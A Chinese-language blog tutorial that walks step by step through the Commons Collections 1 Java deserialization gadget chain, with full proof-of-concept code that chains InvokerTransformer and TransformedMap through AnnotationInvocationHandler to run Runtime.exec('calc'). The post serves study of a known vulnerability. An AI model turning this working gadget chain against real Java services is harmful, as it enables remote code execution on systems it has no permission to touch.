<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="CommonsCollections1链手写利用, MajorT&#39;s Blog">
    <meta name="description" content="竹杖芒鞋轻胜马，何妨吟啸且徐行
什么是CommonsCollections？Commons由三部分组成：Proper（是一些已发布的项目）、sandbox（是一些正在开发的项目）和Dormant（是一些刚启动或者已经停止维护的项目）。Com">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="referrer" content="no-referrer-when-downgrade">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>CommonsCollections1链手写利用 | MajorT&#39;s Blog</title>
    <link rel="icon" type="image/png" href="/favicon.png">
    


    <!-- bg-cover style     -->



<link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.min.css">
<link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
<link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
<link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
<link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
<link rel="stylesheet" type="text/css" href="/css/matery.css">
<link rel="stylesheet" type="text/css" href="/css/my.css">
<link rel="stylesheet" type="text/css" href="/css/dark.css" media="none" onload="if(media!='all')media='all'">




    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
    <link rel="stylesheet" href="/css/post.css">




    



    <script src="/libs/jquery/jquery-3.6.0.min.js"></script>

<meta name="generator" content="Hexo 7.1.1"></head>


<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">MajorT&#39;s Blog</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
  <li>
    <a href="javascript:;" class="waves-effect waves-light" onclick="switchNightMode()" title="深色/浅色模式" >
      <i id="sum-moon-icon" class="fas fa-sun" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">MajorT&#39;s Blog</div>
        <div class="logo-desc">
            
            Never really desperate, only the lost of the soul.
            
        </div>
    </div>

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			留言板
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/majorttt" class="waves-effect waves-light" target="_blank">
                <i class="fab fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>


        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/majorttt" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/7.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">CommonsCollections1链手写利用</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/Java%E5%AE%89%E5%85%A8/">
                                <span class="chip bg-color">Java安全</span>
                            </a>
                        
                            <a href="/tags/%E4%BB%A3%E7%A0%81/">
                                <span class="chip bg-color">代码</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/Java%E5%AE%89%E5%85%A8/" class="post-category">
                                Java安全
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2024-03-26
                </div>
                

                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-check fa-fw"></i>更新日期:&nbsp;&nbsp;
                    2024-03-26
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    2.7k
                </div>
                

                

                
                    <div id="busuanzi_container_page_pv" class="info-break-policy">
                        <i class="far fa-eye fa-fw"></i>阅读次数:&nbsp;&nbsp;
                        <span id="busuanzi_value_page_pv"></span>
                    </div>
				
            </div>
        </div>
        <hr class="clearfix">

        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <p><em><strong>竹杖芒鞋轻胜马，何妨吟啸且徐行</strong></em></p>
<h1><span id="什么是commonscollections">什么是CommonsCollections？</span></h1><p>Commons由三部分组成：Proper（是一些已发布的项目）、sandbox（是一些正在开发的项目）和Dormant（是一些刚启动或者已经停止维护的项目）。<br>CommonsCollections包为java标砖的Collections API提供了相当好的补充。在此基础上对其常用的数据结构操作进行了很好的封装、抽象和补充。让我们在开发应用程序的过程中，既保证了性能，同时也能大大简化代码。<br>Commons都是一些集合类，集合类一般都可以接收任意对象。</p>
<h1><span id="环境搭建">环境搭建</span></h1><p>参考：<br>1、<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_63928796/article/details/129591227">https://blog.csdn.net/qq_63928796/article/details/129591227</a><br>2、组长的视频</p>
<h1><span id="代码思路分析">代码思路分析</span></h1><p>已知危险方法为Transformer接口的transform方法。<br><img src="/images/3/Image1.png" alt="img1"><br>点击左侧的小绿标可查看实现了该接口的类：<br><img src="/images/3/Image2.png" alt="img2"><br>找到了InvokerTransformer中的transform方法为危险方法：<br><img src="/images/3/Image3.png" alt="img3"><br>上述代码逻辑：<br>接收一个类，并反射调用类的方法。<br>接下来找一下iMethodName和iParamTypes参数从哪获取，找一下构造函数。<br><img src="/images/3/Image4.png" alt="img4"><br>可以看到，在构造函数中，为iMethodName和iParamTypes赋值了<br>很好，也就是说，该函数中所有参数都是用户可控的，我们来写一个调用：<br>普通调用：<br><img src="/images/3/Image5.png" alt="img5"><br>反射调用：<br><img src="/images/3/Image6.png" alt="img6"><br>调用transform方法：<br><img src="/images/3/Image7.png" alt="img7"><br>经过测试，该方法可以被成功利用，接下来我们倒推，去找它的利用链：<br>谁调用了transform方法？<br>TransformedMap类：<br><img src="/images/3/Image8.png" alt="img8"><br>在该类的checkSetValue方法中，valueTransformer调用了transform方法，看看valueTransformer是什么？<br>tansformer接口定义的一个参数<br><img src="/images/3/Image9.png" alt="img9"><br>构造方法中传入了该参数的值：<br><img src="/images/3/Image10.png" alt="img10"><br>所以，我们只要在该构造方法中传入invokerTransformer对象，就会调用它的transformer危险方法。<br>该构造方法被protected修饰，我们看看有没有调用。<br>在同一个类中，decorate方法调用了构造方法：<br><img src="/images/3/Image11.png" alt="img11"><br>所以，我们要在decorate方法中，将valueTransformer的值设置为InvokerTransformer的对象。<br>这样，在checkSetValue方法中调用的就是InvokerTransformer对象的transformer危险方法了。<br>虽然有了上述调用，但是在checkSetValue方法中，传入的参数却不知道是否可控。<br><img src="/images/3/Image12.png" alt="img12"><br>所以接下来，我们需要去找，谁调用了checkSetValue方法。<br>只有一个调用，在MapEntry类中<br><img src="/images/3/Image13.png" alt="img13"><br>谁调用了setValue？<br><img src="/images/3/Image14.png" alt="img14"><br>结果太多，但是我们可以根据entry这个名称来分析理解一下。<br>什么是entry？<br>Entry类概述：<br>    java的entry是一个静态内部类，实现Map.Entry&lt;k,v&gt;这个接口，通过entry类可以构成一个单向链表。<br>java中的Map以及Map.Entry<br>    1）Map是java中的接口，Map.Entry；<br>    2）Map提供了一些常用方法，如keySet()、entrySet()等方法；<br>    3）keySet()方法返回值是Map中key值的集合，entrySet()的返回值也是返回一个Set集合，此集合的类型为Map.Entry；<br>    4）Map.Entry是Map声明的一个内部接口，此接口为泛型，定义为Entry&lt;K, V&gt;。它表示Map中的一个实体（一个key-value对）。接口中有getKey(), getValue方法。</p>
<p>所以这个setValue，其实就是Map中的setValue，我们遍历entry时调用即可。<br><img src="/images/3/Image15.png" alt="img15"><br>一个entry即一个Map键值对，我们新建一个Map为其赋值，并遍历，代码如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">public class ccTest &#123;</span><br><span class="line">	public static void main(String[] args) throws Exception &#123;</span><br><span class="line">		//Runtime.getRuntime().exec(&quot;calc&quot;);</span><br><span class="line">		Runtime runtime = Runtime.getRuntime();</span><br><span class="line">		// Class c = runtime.getClass();</span><br><span class="line">		// Method runtimeMethod = c.getDeclaredMethod(&quot;exec&quot;, String.class);</span><br><span class="line">		// runtimeMethod.setAccessible(true);</span><br><span class="line">		// runtimeMethod.invoke(runtime, &quot;calc&quot;);</span><br><span class="line">		InvokerTransformer invokerTransformer = new InvokerTransformer(&quot;exec&quot;, new Class[]&#123;String.class&#125;, new Object[]&#123;&quot;calc&quot;&#125;);</span><br><span class="line">		//invokerTransformer.transform(runtime);</span><br><span class="line">		//创建map对象</span><br><span class="line">		HashMap&lt;Object, Object&gt; map = new HashMap&lt;&gt;();</span><br><span class="line">		//对象赋值</span><br><span class="line">		map.put(&quot;1&quot;, &quot;11&quot;);</span><br><span class="line">		//调用decorate方法，该方法返回一个map，并将valueTransformer参数赋值为invokerTransformer（InvokerTransformer类）</span><br><span class="line">		Map&lt;Object, Object&gt; checksetValue = TransformedMap.decorate(map, null, invokerTransformer);</span><br><span class="line">		//遍历，调用entry的setValue方法会调用到MapEntry的setValue方法，进而调用到TransformedMap的checkSetValue方法</span><br><span class="line">		for(Map.Entry entry : checksetValue.entrySet())&#123;</span><br><span class="line">			entry.setValue(runtime);</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>执行成功：<br><img src="/images/3/Image16.png" alt="img16"><br>所以，只要我们找到一个遍历了数组的地方且调用了setValue，最好是在readObject里面，那么我们就找到了入口类。<br>可以看到在AnnotationInvocationHandler类中readObject方法中直接调用了setValue方法：<br><img src="/images/3/Image17.png" alt="img17"><br>接下来分析参数是否我们可控：<br>可以看到，memberValue的值是根据memberValues得到的<br><img src="/images/3/Image18.png" alt="img18"><br>memberValues的值可以在构造函数中由我们控制<br><img src="/images/3/Image19.png" alt="img19"><br>第一个参数Annotation是java中的注解，比如重写时的@Override就是注解。<br>要注意的是，这个类没有public修饰，那么它就是default，也就是我们需要反射调用。<br>代码如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">public static void main(String[] args) throws Exception &#123;</span><br><span class="line">	Runtime runtime = Runtime.getRuntime();</span><br><span class="line">	InvokerTransformer invokerTransformer = new InvokerTransformer(&quot;exec&quot;, new Class[]&#123;String.class&#125;, new Object[]&#123;&quot;calc&quot;&#125;);</span><br><span class="line">	//创建map对象</span><br><span class="line">	HashMap&lt;Object, Object&gt; map = new HashMap&lt;&gt;();</span><br><span class="line">	//对象赋值</span><br><span class="line">	map.put(&quot;1&quot;, &quot;11&quot;);</span><br><span class="line">	//调用decorate方法，该方法返回一个map，并将valueTransformer参数赋值为invokerTransformer（InvokerTransformer类）</span><br><span class="line">	Map&lt;Object, Object&gt; checksetValue = TransformedMap.decorate(map, null, invokerTransformer);</span><br><span class="line">	Class c = Class.forName(&quot;sun.reflect.annotation.AnnotationInvocationHandler&quot;);</span><br><span class="line">	Constructor annotationInvocationHandlerConstructor = c.getDeclaredConstructor(Class.class, Map.class);</span><br><span class="line">	Object o = annotationInvocationHandlerConstructor.newInstance(Override.class, checksetValue);</span><br><span class="line">	serilization(o);</span><br><span class="line">	unserilization(&quot;cc.ser&quot;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>序列化和反序列化函数代码如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">public static void serilization(Object o) throws IOException &#123;</span><br><span class="line">	ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream(&quot;cc.ser&quot;));</span><br><span class="line">	objectOutputStream.writeObject(o);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">public static Object unserilization(String filename) throws IOException, ClassNotFoundException &#123;</span><br><span class="line">	ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(filename));</span><br><span class="line">	Object o = objectInputStream.readObject();</span><br><span class="line">	return o;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>写到这里，代码中还存在两个问题。<br>1.在入口类调用setValue方法时的参数值是否可控，我们怎么把runtime对象传进去？<br>2.runtime类没有继承Serializable，无法被序列化。<br>第二个问题解决：Runtime不可以序列化，但是它的class是可以序列化的。<br>首先写一个正常情况下的反射调用：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">Class c = Runtime.class;</span><br><span class="line">//获取runtime的getRuntime方法</span><br><span class="line">Method runtimeMethod = c.getDeclaredMethod(&quot;getRuntime&quot;, null);</span><br><span class="line">//getruntime方法返回一个Runtime对象</span><br><span class="line">Runtime r = (Runtime) runtimeMethod.invoke(null, null);</span><br><span class="line">//获取runtime的exec方法</span><br><span class="line">Method getruntimeMethod = c.getMethod(&quot;exec&quot;, String.class);</span><br><span class="line">//传入对象和参数值执行</span><br><span class="line">getruntimeMethod.invoke(r, &quot;calc&quot;);</span><br></pre></td></tr></table></figure>
<p>执行：<br><img src="/images/3/Image20.png" alt="img20"><br>将其转换为InvokerTransformer格式，代码如下（这里不要只看，一定要敲代码，才能理解）：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Method runtimeMethod = (Method) new InvokerTransformer(&quot;getMethod&quot;, new Class[]&#123;String.class, Class[].class&#125;, new Object[]&#123;&quot;getRuntime&quot;, null&#125; ).transform(Runtime.class);</span><br><span class="line">//即Runtime r = (Runtime) runtimeMethod.invoke(null, null);</span><br><span class="line">Runtime runtime = (Runtime) new InvokerTransformer(&quot;invoke&quot;, new Class[]&#123;Object.class, Object[].class&#125;, new Object[]&#123;null, null&#125;).transform(runtimeMethod);</span><br><span class="line">//即getruntimeMethod.invoke(r, &quot;calc&quot;);</span><br><span class="line">new InvokerTransformer(&quot;exec&quot;, new Class[]&#123;String.class&#125;, new Object[]&#123;&quot;calc&quot;&#125;).transform(runtime);</span><br></pre></td></tr></table></figure>
<p>执行：<br><img src="/images/3/Image21.png" alt="img21"><br>写完后，我们可以发现，这是一个链式结构，而有一个实现了Transformer接口的类，叫ChainedTransformer，其中刚好就有链式调用的方法，即将前一个的输出作为后一个的输入：<br><img src="/images/3/Image22.png" alt="img22"><br>所以代码又可以改写为如下形式：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">Transformer transformer[] = new Transformer[]&#123;</span><br><span class="line">new InvokerTransformer(&quot;getMethod&quot;, new Class[]&#123;String.class, Class[].class&#125;, new Object[]&#123;&quot;getRuntime&quot;, null&#125; ),</span><br><span class="line">new InvokerTransformer(&quot;invoke&quot;, new Class[]&#123;Object.class, Object[].class&#125;, new Object[]&#123;null, null&#125;),</span><br><span class="line">new InvokerTransformer(&quot;exec&quot;, new Class[]&#123;String.class&#125;, new Object[]&#123;&quot;calc&quot;&#125;)</span><br><span class="line">&#125;;</span><br><span class="line">ChainedTransformer chainedTransformer = new ChainedTransformer(transformer);</span><br><span class="line">chainedTransformer.transform(Runtime.class);</span><br></pre></td></tr></table></figure>
<p>我们TransformedMap中decorate方法中对invokerTransformer对象的调用改为chainedTransformer<br>此时完整代码如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line">public class ccTest &#123;</span><br><span class="line">	public static void main(String[] args) throws Exception &#123;</span><br><span class="line"></span><br><span class="line">		Transformer transformer[] = new Transformer[]&#123;</span><br><span class="line">			new InvokerTransformer(&quot;getMethod&quot;, new Class[]&#123;String.class, Class[].class&#125;, new Object[]&#123;&quot;getRuntime&quot;, null&#125; ),</span><br><span class="line">			new InvokerTransformer(&quot;invoke&quot;, new Class[]&#123;Object.class, Object[].class&#125;, new Object[]&#123;null, null&#125;),</span><br><span class="line">			new InvokerTransformer(&quot;exec&quot;, new Class[]&#123;String.class&#125;, new Object[]&#123;&quot;calc&quot;&#125;)</span><br><span class="line">		&#125;;</span><br><span class="line">		ChainedTransformer chainedTransformer = new ChainedTransformer(transformer);</span><br><span class="line">		//chainedTransformer.transform(Runtime.class);</span><br><span class="line">		// Runtime runtime = Runtime.getRuntime();</span><br><span class="line">		// InvokerTransformer invokerTransformer = new InvokerTransformer(&quot;exec&quot;, new Class[]&#123;String.class&#125;, new Object[]&#123;&quot;calc&quot;&#125;);</span><br><span class="line">		//创建map对象</span><br><span class="line">		HashMap&lt;Object, Object&gt; map = new HashMap&lt;&gt;();</span><br><span class="line">		//对象赋值</span><br><span class="line">		map.put(&quot;1&quot;, &quot;11&quot;);</span><br><span class="line">		//调用decorate方法，该方法返回一个map，并将valueTransformer参数赋值为invokerTransformer（InvokerTransformer类）</span><br><span class="line">		Map&lt;Object, Object&gt; checksetValue = TransformedMap.decorate(map, null, chainedTransformer);</span><br><span class="line">		Class c = Class.forName(&quot;sun.reflect.annotation.AnnotationInvocationHandler&quot;);</span><br><span class="line">		Constructor annotationInvocationHandlerConstructor = c.getDeclaredConstructor(Class.class, Map.class);</span><br><span class="line">		annotationInvocationHandlerConstructor.setAccessible(true);</span><br><span class="line">		Object o = annotationInvocationHandlerConstructor.newInstance(Override.class, checksetValue);</span><br><span class="line">		serilization(o);</span><br><span class="line">		unserilization(&quot;cc.ser&quot;);</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	public static void serilization(Object o) throws IOException &#123;</span><br><span class="line">		ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream(&quot;cc.ser&quot;));</span><br><span class="line">		objectOutputStream.writeObject(o);</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	public static Object unserilization(String filename) throws IOException, ClassNotFoundException &#123;</span><br><span class="line">		ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(filename));</span><br><span class="line">		Object o = objectInputStream.readObject();</span><br><span class="line">		return o;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>runtime无法序列化的问题解决了，接下来解决第一个问题：<br>在入口类调用setValue方法时的参数值是否可控，我们怎么把runtime对象传进去？以及绕过两个if进入我们想要的地方<br><img src="/images/3/Image23.png" alt="img23"><br>在第一个if处下断点，看怎么走<br><img src="/images/3/Image24.png" alt="img24"><br>debug<br>可以看到，type就是override<br><img src="/images/3/Image25.png" alt="img25"><br>走到第一个if的时候，看到membertype的值为null，所以并不会进到我们想要的地方<br><img src="/images/3/Image26.png" alt="img26"><br>memberType指的是override的成员变量，进去override看一下：<br><img src="/images/3/Image27.png" alt="img27"><br><img src="/images/3/Image28.png" alt="img28"><br>没有成员变量，那我们将override改为target试试，target有一个成员方法value<br><img src="/images/3/Image29.png" alt="img29"><br>debug：<br>这里menbertype依然为null，因为我们再代码中为key赋值为1，应该赋值为value：<br><img src="/images/3/Image30.png" alt="img30"><br><img src="/images/3/Image31.png" alt="img31"><br>再次跟进去后，可以进入if<br><img src="/images/3/Image32.png" alt="img32"><br>此时还剩一个问题待解决，setvalue将值设置为了如上图所示，但我们想要的是Runtime.getRuntime<br>跟进去看看：<br><img src="/images/3/Image33.png" alt="img33"><br>此时的value值我们看看是否可以控制。<br>这时需要用到另一个类叫ConstantTransformer<br><img src="/images/3/Image34.png" alt="img34"><br>它重写了transform方法，该方法为接收任意一个输入，返回一个常量，这个常量是什么呢？<br><img src="/images/3/Image35.png" alt="img35"><br>在它的构造函数里，这个常量由我们控制。不管改函数传入的参数值是什么，它只会返回由我们控制的常量。所以，我们如果把Runtime.getRuntime赋值给常量，即使我们不能控制value参数，当调用ConstantTransformer的transform时，只是会返回常量，也就是Runtime.getRuntime。<br>AnnotationInvocationHandler的setValue最终会调用到下图，最后return在构造constantTransformer时传入的常量也就是Runtime.getRuntime。<br><img src="/images/3/Image36.png" alt="img36"><br><img src="/images/3/Image37.png" alt="img37"><br>最后成功执行：<br><img src="/images/3/Image38.png" alt="img38"></p>
<h1><span id="总结">总结</span></h1><p>梳理一下整个流程：<br>1.危险方法为InvokeTransformer中的transform函数；<br>2.TransformedMap类中的checkSetValue方法调用了transform方法；<br><img src="/images/3/Image39.png" alt="img39"><br>2.1 valueTransformer值由构造函数获取，构造函数的值由decorate函数传入；<br><img src="/images/3/Image40.png" alt="img40"><br><img src="/images/3/Image41.png" alt="img41"><br>2.2 value的值需要查找谁调用了checkSetValue方法来寻找是否我们可控；<br>3.AbstractInputCheckedMapDecorator类的内部类MapEntry类中的setValue方法调用了checkSetValue方法；<br><img src="/images/3/Image42.png" alt="img42"><br>3.1 entry代表一个键值对，找到遍历Map的地方，调用setValue赋值为Runtime即可<br>4.AnnotationInvocationHandler类的readObject方法调用了setValue函数，入口类找到了；<br><img src="/images/3/Image43.png" alt="img43"><br>4.1 memberValue的值在构造函数中传入，该类权限为default，需要反射调用其构造方法。</p>
<p>CommonsCollections1就暂时学到这里了，其实还有有一些不太明白的地方，就先暂时放在这里，说不定哪天就豁然开朗了，下篇再会。</p>
<h3><span id="参考链接">参考链接</span></h3><p><a target="_blank" rel="noopener" href="https://www.bilibili.com/video/BV1no4y1U7E1/?spm_id_from=333.999.0.0">https://www.bilibili.com/video/BV1no4y1U7E1/?spm_id_from=333.999.0.0</a><br><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_44874132/article/details/113367441">https://blog.csdn.net/weixin_44874132/article/details/113367441</a></p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">MajorT</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
